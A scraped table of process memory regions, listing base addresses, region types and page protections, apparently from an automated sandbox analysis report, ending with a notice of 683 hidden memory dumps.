|
||
610000
|
unkown
|
page read and write
|
||
2D0000
|
heap private
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1E60000
|
unkown
|
page read and write
|
||
1B595000
|
unkown
|
page read and write
|
||
2EAE000
|
stack
|
page read and write
|
||
7FF00020000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
28CA000
|
unkown
|
page read and write
|
||
12EB2000
|
unkown
|
page read and write
|
||
1B5AD000
|
unkown
|
page read and write
|
||
23B0000
|
unkown
|
page read and write
|
||
1D125000
|
unkown
|
page read and write
|
||
580000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1E60000
|
unkown
|
page read and write
|
||
12C05000
|
unkown
|
page read and write
|
||
CB000
|
unkown
|
page read and write
|
||
206B000
|
heap private
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
1D194000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
860000
|
unkown
|
page readonly
|
||
1D134000
|
unkown
|
page read and write
|
||
2652000
|
heap private
|
page read and write
|
||
7FF00160000
|
unkown
|
page execute and read and write
|
||
21E0000
|
unkown
|
page readonly
|
||
389000
|
heap default
|
page read and write
|
||
7FF00280000
|
unkown
|
page execute and read and write
|
||
1CABE000
|
unkown
|
page read and write
|
||
B0000
|
unkown
|
page readonly
|
||
1B5AB000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page readonly
|
||
1C9C0000
|
heap private
|
page read and write
|
||
3B87000
|
unkown
|
page read and write
|
||
2100000
|
unkown
|
page readonly
|
||
2600000
|
heap private
|
page read and write
|
||
1C7F000
|
unkown
|
page read and write
|
||
2C64000
|
unkown
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
261E000
|
stack
|
page read and write
|
||
7FF001A0000
|
unkown
|
page read and write
|
||
907000
|
heap default
|
page read and write
|
||
297000
|
heap default
|
page read and write
|
||
1D182000
|
unkown
|
page read and write
|
||
310000
|
heap default
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
300000
|
heap default
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
1FE7000
|
unkown
|
page readonly
|
||
2F8E000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
1B563000
|
unkown
|
page read and write
|
||
480000
|
unkown
|
page readonly
|
||
28E000
|
heap default
|
page read and write
|
||
570000
|
unkown
|
page readonly
|
||
1B5AD000
|
unkown
|
page read and write
|
||
1B571000
|
unkown
|
page read and write
|
||
1B8B0000
|
unkown
|
page write copy
|
||
170000
|
unkown
|
page execute and read and write
|
||
1D134000
|
unkown
|
page read and write
|
||
3C0000
|
unkown
|
page readonly
|
||
3415000
|
unkown
|
page read and write
|
||
880000
|
heap private
|
page read and write
|
||
3626000
|
unkown
|
page read and write
|
||
BC000
|
unkown
|
page read and write
|
||
1D25D000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
1D156000
|
unkown
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
1C830000
|
heap private
|
page read and write
|
||
5BD000
|
heap default
|
page read and write
|
||
7FF000D2000
|
unkown
|
page execute and read and write
|
||
470000
|
heap private
|
page read and write
|
||
9B000
|
unkown
|
page read and write
|
||
31BF000
|
unkown
|
page read and write
|
||
7FF00012000
|
unkown
|
page execute and read and write
|
||
1D10E000
|
unkown
|
page read and write
|
||
E0000
|
heap private
|
page read and write
|
||
3556000
|
unkown
|
page read and write
|
||
20EE000
|
unkown
|
page read and write
|
||
282E000
|
unkown
|
page read and write
|
There are 683 hidden memdumps, click here to show them.